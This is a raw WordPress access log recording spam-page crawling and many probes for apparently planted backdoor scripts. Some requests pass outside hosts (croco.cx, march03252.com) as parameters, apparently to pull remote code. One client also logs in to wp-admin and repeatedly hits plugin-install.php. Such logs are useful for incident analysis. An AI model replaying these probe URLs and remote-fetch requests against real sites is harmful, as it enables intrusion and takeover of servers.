150.109.23.247 - - [16/Jun/2026:22:50:31 +0000] "GET /wp-content/plugins/webp-converter-for-media/webp-converter-for-media-decryption.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3298.3 Safari/537.36"
185.177.72.13 - - [16/Jun/2026:22:50:32 +0000] "GET /domowe-sposoby-na-redukcje-stresu-i-zmeczenia-sprawdzone-metody/ HTTP/1.1" 200 27172 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:32 +0000] "GET /category/vademecum/page/123/ HTTP/1.1" 200 21940 "-" "curl/8.7.1"
150.109.23.247 - - [16/Jun/2026:22:50:32 +0000] "GET /wp-content/plugins/webp-converter-for-media/webp-converter-for-media-decryption.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3298.3 Safari/537.36"
185.177.72.13 - - [16/Jun/2026:22:50:33 +0000] "GET /author/admin/page/3/ HTTP/1.1" 200 21570 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:34 +0000] "GET /author/admin/page/123/ HTTP/1.1" 200 22208 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:34 +0000] "GET /discover-stay-rosin-a-solventless-extract-from-contemporary/ HTTP/1.1" 200 23785 "-" "curl/8.7.1"
110.136.6.234 - - [16/Jun/2026:22:50:34 +0000] "GET /wp-content/plugins/webp-converter-for-media/webp-converter-for-media-decryption.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3298.3 Safari/537.36"
185.177.72.13 - - [16/Jun/2026:22:50:35 +0000] "GET /the-500-mah-battery-and-5-salt-nicotine-liquid-in-elf-bar/ HTTP/1.1" 200 23023 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:36 +0000] "GET /you-also-get-two-pods-with-the-kit/ HTTP/1.1" 200 23698 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:36 +0000] "GET /nowadays-markets-have-a-plethora-of-latest-and-established/ HTTP/1.1" 200 22899 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:37 +0000] "GET /this-could-be-as-a-end-result-of-you-havent-completed-the-age/ HTTP/1.1" 200 23957 "-" "curl/8.7.1"
47.79.119.13 - - [16/Jun/2026:22:50:37 +0000] "GET /wp-content/plugins/romethemeform/autoloader-json.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36"
185.177.72.13 - - [16/Jun/2026:22:50:38 +0000] "GET /the-e-cigarette-vape-pen-or-different-vaping-gadget-heats-the/ HTTP/1.1" 200 23103 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:39 +0000] "GET /these-devices-are-good-for-on-the-go-vaping/ HTTP/1.1" 200 23814 "-" "curl/8.7.1"
31.7.86.35 - - [16/Jun/2026:22:50:39 +0000] "GET /wp-content/themes/news-bite/index-session.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
172.233.77.45 - - [16/Jun/2026:22:50:39 +0000] "GET /wp-includes/class-smtp-method.php?merge=croco.cx/3 HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)"
185.177.72.13 - - [16/Jun/2026:22:50:39 +0000] "GET /youve-obtained-tar-which-builds-up-in-your-lungs-and-dont/ HTTP/1.1" 200 22962 "-" "curl/8.7.1"
193.168.137.182 - - [16/Jun/2026:22:50:39 +0000] "GET /wp-content/themes/news-bite/index-session.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
185.177.72.13 - - [16/Jun/2026:22:50:40 +0000] "GET /offered-in-both-freebase-and-nic-salt-formulation/ HTTP/1.1" 200 24041 "-" "curl/8.7.1"
147.45.172.23 - - [16/Jun/2026:22:50:40 +0000] "GET /wp-content/themes/news-bite/index-session.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
185.36.144.15 - - [16/Jun/2026:22:50:40 +0000] "GET /wp-content/themes/news-bite/search-git.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
185.177.72.13 - - [16/Jun/2026:22:50:40 +0000] "GET /and-if-youre-uninterested-in-paying-20-30-on-a-small-bottle/ HTTP/1.1" 200 23494 "-" "curl/8.7.1"
158.160.136.28 - - [16/Jun/2026:22:50:41 +0000] "GET /wp-content/themes/news-bite/search-git.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
139.162.91.253 - - [16/Jun/2026:22:50:41 +0000] "GET /wp-includes/class-smtp-method.php?merge=croco.cx/3 HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)"
38.244.50.227 - - [16/Jun/2026:22:50:41 +0000] "GET /wp-content/plugins/romethemeform/autoloader-json.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36"
185.177.72.13 - - [16/Jun/2026:22:50:41 +0000] "GET /artykuly/page/4/ HTTP/1.1" 200 21413 "-" "curl/8.7.1"
156.238.251.148 - - [16/Jun/2026:22:50:42 +0000] "GET /wp-content/themes/news-bite/search-git.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
139.162.68.93 - - [16/Jun/2026:22:50:42 +0000] "GET /wp-content/themes/news-bite/index-session.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
185.177.72.13 - - [16/Jun/2026:22:50:42 +0000] "GET /co88-casino-50-free-spins/ HTTP/1.1" 200 21374 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:42 +0000] "GET /slot-machine-senza-registrazione-gratis/ HTTP/1.1" 200 21431 "-" "curl/8.7.1"
202.47.89.24 - - [16/Jun/2026:22:50:43 +0000] "GET /wp-content/plugins/romethemeform/autoloader-json.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36"
119.28.64.217 - - [16/Jun/2026:22:50:43 +0000] "GET /wp-content/plugins/webp-converter-for-media/webp-converter-for-media-decryption.php HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Zoom 3.6.0)"
74.208.212.211 - - [16/Jun/2026:22:50:43 +0000] "GET /wp-content/themes/news-bite/search-git.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
185.177.72.13 - - [16/Jun/2026:22:50:43 +0000] "GET /slot-soldi-finti/ HTTP/1.1" 200 21518 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:44 +0000] "GET /migliori-slot-high-5-games/ HTTP/1.1" 200 21443 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:44 +0000] "GET /enzo-casino-bonus-senza-deposito/ HTTP/1.1" 200 21784 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:45 +0000] "GET /igt-plc-quotazione/ HTTP/1.1" 200 21572 "-" "curl/8.7.1"
94.103.84.74 - - [16/Jun/2026:22:50:45 +0000] "GET /wp-login.php HTTP/1.1" 200 3270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
185.177.72.13 - - [16/Jun/2026:22:50:46 +0000] "GET /previsione-numeri-roulette/ HTTP/1.1" 200 21720 "-" "curl/8.7.1"
94.103.84.74 - - [16/Jun/2026:22:50:46 +0000] "GET /wp-login.php?wp_lang=en_US HTTP/1.1" 200 2406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
185.177.72.13 - - [16/Jun/2026:22:50:47 +0000] "GET /gioco-del-casin%C3%B2/ HTTP/1.1" 200 21714 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:47 +0000] "GET /1win-casino-recensioni/ HTTP/1.1" 200 21405 "-" "curl/8.7.1"
94.103.84.74 - - [16/Jun/2026:22:50:47 +0000] "POST /wp-login.php?wp_lang=en_US HTTP/1.1" 302 5 "https://apteka-centralna.pl/wp-login.php?wp_lang=en_US" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
185.177.72.13 - - [16/Jun/2026:22:50:48 +0000] "GET /artykuly/page/1031/ HTTP/1.1" 200 20766 "-" "curl/8.7.1"
94.103.84.74 - - [16/Jun/2026:22:50:48 +0000] "GET /wp-admin/ HTTP/1.1" 200 42553 "https://apteka-centralna.pl/wp-login.php?wp_lang=en_US" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
185.177.72.13 - - [16/Jun/2026:22:50:49 +0000] "GET /category/vademecum/page/4/ HTTP/1.1" 200 21400 "-" "curl/8.7.1"
158.160.208.171 - - [16/Jun/2026:22:50:49 +0000] "GET /wp-content/plugins/webp-converter-for-media/webp-converter-for-media-decryption.php HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Zoom 3.6.0)"
38.244.50.227 - - [16/Jun/2026:22:50:49 +0000] "GET /wp-includes/class-smtp-method.php?merge=croco.cx/3 HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)"
75.178.139.61 - - [16/Jun/2026:22:50:49 +0000] "GET /wp-content/themes/news-bite/index-session.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
185.177.72.13 - - [16/Jun/2026:22:50:49 +0000] "GET /gioco-di-carte-spades/ HTTP/1.1" 200 21584 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:50 +0000] "GET /zdrowe-odzywianie-dla-osob-starszych-praktyczne-porady-na-co-dzien/ HTTP/1.1" 200 29650 "-" "curl/8.7.1"
139.162.91.253 - - [16/Jun/2026:22:50:50 +0000] "GET /wp-content/themes/news-bite/search-git.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
139.162.108.209 - - [16/Jun/2026:22:50:50 +0000] "GET /wp-content/plugins/romethemeform/autoloader-json.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36"
134.209.106.75 - - [16/Jun/2026:22:50:50 +0000] "GET /wp-includes/class-smtp-method.php?merge=croco.cx/3 HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)"
156.230.188.66 - - [16/Jun/2026:22:50:50 +0000] "GET /wp-content/plugins/webp-converter-for-media/webp-converter-for-media-decryption.php HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Zoom 3.6.0)"
185.177.72.13 - - [16/Jun/2026:22:50:50 +0000] "GET /wplyw-aktywnosci-fizycznej-na-zdrowie-psychiczne-odkryj-korzysci/ HTTP/1.1" 200 23234 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:51 +0000] "GET /naturalne-metody-leczenia-tarczycy-5-sprawdzonych-sposobow/ HTTP/1.1" 200 23304 "-" "curl/8.7.1"
94.103.84.74 - - [16/Jun/2026:22:50:51 +0000] "GET /wp-admin/plugin-install.php HTTP/1.1" 500 2859 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
150.136.78.17 - - [16/Jun/2026:22:50:51 +0000] "GET /wp-content/plugins/webp-converter-for-media/webp-converter-for-media-decryption.php HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Zoom 3.6.0)"
139.162.68.241 - - [16/Jun/2026:22:50:52 +0000] "GET /wp-content/themes/news-bite/search-git.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
104.28.161.35 - - [16/Jun/2026:22:50:52 +0000] "GET /wp-content/plugins/webp-converter-for-media/webp-converter-for-media-decryption.php HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Zoom 3.6.0)"
185.177.72.13 - - [16/Jun/2026:22:50:52 +0000] "GET /domowe-sposoby-na-zlagodzenie-alergii-skuteczne-porady/ HTTP/1.1" 200 23927 "-" "curl/8.7.1"
172.233.77.45 - - [16/Jun/2026:22:50:52 +0000] "GET /wp-content/plugins/romethemeform/autoloader-json.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36"
139.162.68.93 - - [16/Jun/2026:22:50:52 +0000] "GET /wp-includes/class-smtp-method.php?merge=croco.cx/3 HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)"
94.103.84.74 - - [16/Jun/2026:22:50:52 +0000] "GET /wp-admin/plugin-install.php HTTP/1.1" 500 2859 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
185.177.72.13 - - [16/Jun/2026:22:50:52 +0000] "GET /wplyw-diety-srodziemnomorskiej-na-zdrowie-serca-5-skutkow/ HTTP/1.1" 200 23216 "-" "curl/8.7.1"
165.99.239.85 - - [16/Jun/2026:22:50:53 +0000] "GET /wp-content/plugins/webp-converter-for-media/webp-converter-for-media-decryption.php HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Zoom 3.6.0)"
38.51.123.225 - - [16/Jun/2026:22:50:53 +0000] "GET /wp-content/themes/news-bite/search-git.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
185.177.72.13 - - [16/Jun/2026:22:50:53 +0000] "GET /domowe-metody-na-migrene-skuteczne-sposoby-na-ulge/ HTTP/1.1" 200 23878 "-" "curl/8.7.1"
94.103.84.74 - - [16/Jun/2026:22:50:53 +0000] "GET /wp-admin/plugin-install.php HTTP/1.1" 500 2859 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
103.153.92.32 - - [16/Jun/2026:22:50:53 +0000] "GET /wp-includes/class-smtp-method.php?merge=croco.cx/3 HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)"
94.103.84.74 - - [16/Jun/2026:22:50:54 +0000] "GET /wp-admin/plugin-install.php HTTP/1.1" 500 2859 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
47.82.76.35 - - [16/Jun/2026:22:50:54 +0000] "GET /wp-content/themes/news-bite/index-session.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
185.177.72.13 - - [16/Jun/2026:22:50:54 +0000] "GET /naturalne-sposoby-na-obnizenie-cisnienia-krwi-sprawdz-metody/ HTTP/1.1" 200 23613 "-" "curl/8.7.1"
101.47.74.252 - - [16/Jun/2026:22:50:54 +0000] "GET /wp-content/plugins/romethemeform/autoloader-json.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36"
185.177.72.13 - - [16/Jun/2026:22:50:54 +0000] "GET /wplyw-probiotykow-na-zdrowie-ukladu-pokarmowego-co-warto-wiedziec/ HTTP/1.1" 200 28014 "-" "curl/8.7.1"
94.103.84.74 - - [16/Jun/2026:22:50:55 +0000] "GET /wp-admin/plugin-install.php HTTP/1.1" 500 2859 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
202.47.89.24 - - [16/Jun/2026:22:50:55 +0000] "GET /wp-content/plugins/webp-converter-for-media/webp-converter-for-media-decryption.php HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Zoom 3.6.0)"
45.12.135.172 - - [16/Jun/2026:22:50:55 +0000] "GET /wp-content/plugins/romethemeform/autoloader-json.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36"
159.198.35.187 - - [16/Jun/2026:22:50:55 +0000] "GET /wp-includes/class-smtp-method.php?merge=croco.cx/3 HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)"
42.114.172.41 - - [16/Jun/2026:22:50:55 +0000] "GET /wp-content/themes/news-bite/search-git.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
198.44.130.17 - - [16/Jun/2026:22:50:55 +0000] "GET /wp-content/themes/news-bite/index-session.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
185.177.72.13 - - [16/Jun/2026:22:50:55 +0000] "GET /naturalne-domowe-receptury-na-zdrowa-skore-zima-skuteczne-sposoby/ HTTP/1.1" 200 28216 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:56 +0000] "GET /cwiczenia-domowe-na-bol-plecow-u-doroslych-skuteczne-i-proste-metody/ HTTP/1.1" 200 26165 "-" "curl/8.7.1"
94.103.84.74 - - [16/Jun/2026:22:50:56 +0000] "GET /wp-admin/plugin-install.php HTTP/1.1" 500 2859 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
128.127.145.102 - - [16/Jun/2026:22:50:56 +0000] "GET /wp-includes/theme-templates-library.php?ajax-response=march03252.com/readme HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office)"
134.209.106.75 - - [16/Jun/2026:22:50:56 +0000] "GET /wp-admin/revision-decryption.php HTTP/1.1" 200 3442 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; ms-office)"
75.178.139.61 - - [16/Jun/2026:22:50:56 +0000] "GET /wp-content/plugins/webp-converter-for-media/webp-converter-for-media-decryption.php HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Zoom 3.6.0)"
185.177.72.13 - - [16/Jun/2026:22:50:56 +0000] "GET /category/vademecum/page/122/ HTTP/1.1" 200 21720 "-" "curl/8.7.1"
47.79.23.252 - - [16/Jun/2026:22:50:56 +0000] "GET /wp-includes/class-smtp-method.php?merge=croco.cx/3 HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)"
94.103.84.74 - - [16/Jun/2026:22:50:57 +0000] "GET /wp-admin/plugin-install.php HTTP/1.1" 500 2859 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
139.162.91.253 - - [16/Jun/2026:22:50:57 +0000] "GET /wp-content/themes/news-bite/index-session.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
185.177.72.13 - - [16/Jun/2026:22:50:57 +0000] "GET /author/admin/page/4/ HTTP/1.1" 200 21675 "-" "curl/8.7.1"
75.102.33.66 - - [16/Jun/2026:22:50:58 +0000] "GET /wp-content/plugins/romethemeform/autoloader-json.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36"
142.252.81.201 - - [16/Jun/2026:22:50:58 +0000] "GET /wp-content/themes/kadence/comments-sample.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
47.79.23.252 - - [16/Jun/2026:22:50:58 +0000] "GET /wp-includes/theme-templates-library.php?ajax-response=march03252.com/readme HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office)"
94.103.84.74 - - [16/Jun/2026:22:50:58 +0000] "GET /wp-admin/plugin-install.php HTTP/1.1" 500 2859 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
185.177.72.13 - - [16/Jun/2026:22:50:58 +0000] "GET /author/admin/page/122/ HTTP/1.1" 200 21987 "-" "curl/8.7.1"
140.245.99.105 - - [16/Jun/2026:22:50:58 +0000] "GET /wp-includes/class-smtp-method.php?merge=croco.cx/3 HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)"
47.79.79.35 - - [16/Jun/2026:22:50:58 +0000] "GET /wp-content/plugins/webp-converter-for-media/webp-converter-for-media-decryption.php HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Zoom 3.6.0)"
158.160.136.28 - - [16/Jun/2026:22:50:58 +0000] "GET /wp-content/themes/kadence/comments-sample.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
185.177.72.13 - - [16/Jun/2026:22:50:58 +0000] "GET /its-a-reliable-alternative-if-youre-after-performance-and/ HTTP/1.1" 200 23245 "-" "curl/8.7.1"
150.136.78.17 - - [16/Jun/2026:22:50:59 +0000] "GET /wp-includes/theme-templates-library.php?ajax-response=march03252.com/readme HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office)"
94.103.84.74 - - [16/Jun/2026:22:50:59 +0000] "GET /wp-admin/plugin-install.php HTTP/1.1" 500 2859 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
203.10.98.186 - - [16/Jun/2026:22:50:59 +0000] "GET /wp-content/themes/news-bite/search-git.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
178.159.94.80 - - [16/Jun/2026:22:50:59 +0000] "GET /wp-content/plugins/webp-converter-for-media/webp-converter-for-media-decryption.php HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Zoom 3.6.0)"
185.177.72.13 - - [16/Jun/2026:22:50:59 +0000] "GET /vaping-is-usually-thought-of-as-safer-than-cigarette-smoking/ HTTP/1.1" 200 23104 "-" "curl/8.7.1"
94.103.84.74 - - [16/Jun/2026:22:50:59 +0000] "GET /wp-admin/plugin-install.php HTTP/1.1" 500 2859 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
150.109.23.247 - - [16/Jun/2026:22:50:59 +0000] "GET /wp-content/plugins/romethemeform/autoloader-json.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36"
178.159.94.80 - - [16/Jun/2026:22:50:59 +0000] "GET /wp-content/themes/news-bite/search-git.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
185.177.72.13 - - [16/Jun/2026:22:51:00 +0000] "GET /for-those-stepping-away-from-nicotine-however-nonetheless/ HTTP/1.1" 200 22669 "-" "curl/8.7.1"
203.10.98.186 - - [16/Jun/2026:22:51:00 +0000] "GET /wp-content/themes/kadence/comments-sample.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
185.177.72.13 - - [16/Jun/2026:22:51:00 +0000] "GET /the-vape-juices-for-pod-mods-have-excessive-nicotine/ HTTP/1.1" 200 23967 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:51:01 +0000] "GET /were-adding-more-social-and-information-sharing-elements-now/ HTTP/1.1" 200 24037 "-" "curl/8.7.1"
94.103.84.74 - - [16/Jun/2026:22:51:01 +0000] "GET /wp-admin/plugins.php HTTP/1.1" 500 2859 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
